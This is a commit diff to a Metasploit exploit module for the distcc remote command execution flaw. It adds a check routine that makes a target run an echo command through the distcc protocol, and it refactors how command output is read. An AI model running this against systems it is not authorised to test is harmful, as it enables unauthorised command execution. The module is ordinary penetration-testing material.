Merge branch 'distcc-add-check' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-distcc-add-check
commit
af8cb03d1b
|
@ -63,6 +63,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
r = rand_text_alphanumeric(10)
|
||||
connect
|
||||
sock.put(dist_cmd("sh", "-c", "echo #{r}"))
|
||||
|
||||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
err, out = read_output
|
||||
if out.index(r)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
@ -72,6 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
err, out = read_output
|
||||
|
||||
(err || "").split("\n") do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
(out || "").split("\n") do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def read_output
|
||||
|
||||
res = sock.get_once(24, 5)
|
||||
|
||||
if !(res and res.length == 24)
|
||||
|
@ -85,12 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
return [nil, nil] if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
err = sock.get_once(len, 5)
|
||||
end
|
||||
|
||||
# Check STDOUT
|
||||
|
@ -98,16 +125,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
return [err, nil] if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
out = sock.get_once(len, 5)
|
||||
end
|
||||
return [err, out]
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue